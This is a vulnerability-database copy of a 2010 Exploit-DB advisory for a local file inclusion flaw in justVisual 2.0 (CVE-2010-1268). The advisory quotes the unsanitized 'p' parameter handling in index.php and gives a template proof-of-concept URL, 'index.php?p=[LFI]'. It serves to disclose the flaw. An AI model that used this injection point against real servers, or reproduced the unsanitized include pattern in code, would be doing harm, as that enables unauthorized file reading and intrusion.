Lucene search
+L

justVisual 2.0 - 'index.php' Local File Inclusion

🗓️ 25 Mar 2010 00:00:00Reported by eidelweissType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

justVisual 2.0 Local File Inclusion Vulnerability, Version 2.0, Medium Ris

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-1268
25 Mar 201000:00
circl
cve
CVE
CVE-2010-1268
6 Apr 201015:00
cve
cvelist
Cvelist
CVE-2010-1268
6 Apr 201015:00
cvelist
euvd
EUVD
EUVD-2010-1297
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-1268
6 Apr 201015:30
nvd
openvas
OpenVAS
justVisual <= 2.0 LFI Vulnerability
26 Mar 201000:00
openvas
prion
Prion
Directory traversal
6 Apr 201015:30
prion
#########################################################################
	justVisual 2.0 (index.php) <= LFI Vulnerability
#########################################################################

[+]Title:	justVisual 2.0 (index.php) Local File Vulnerability
[+]Version:	2.0
[+]License:	http://www.gnu.org/copyleft/gpl.html
[+]Download:	http://fh54.de/justVisual/packages/justVisual2.zip
[+]Risk:	Medium
[+]Local:	Yes
[-]Remote:	No

###########################################################
[!]Author:  eidelweiss
[!]Contact: eidelweiss[at]cyberservices[dot]com
[!]Thank`s: sp3x (securityreason) - JosS (hack0wn) - r0073r & 0x1D (inj3ct0r)
[!]Special: [D]eal [C]yber - syabilla_putri (miss u) & all my friends
###########################################################

-=[ VULN CODE ]=-

	$selfname=basename($_SERVER['PHP_SELF'],'.php');
	if(isset($_GET['p']) && !empty($_GET['p'])) {
		//$selfname=basename($_GET['p'],'.php');
		$selfname=str_replace('.php','',$_GET['p']);


-=[ P0C ]=-

	Http://127.0.0.1/index.php?p=[LFI]

###############################=[E0F]=###################################

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Mar 2010 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.02297
28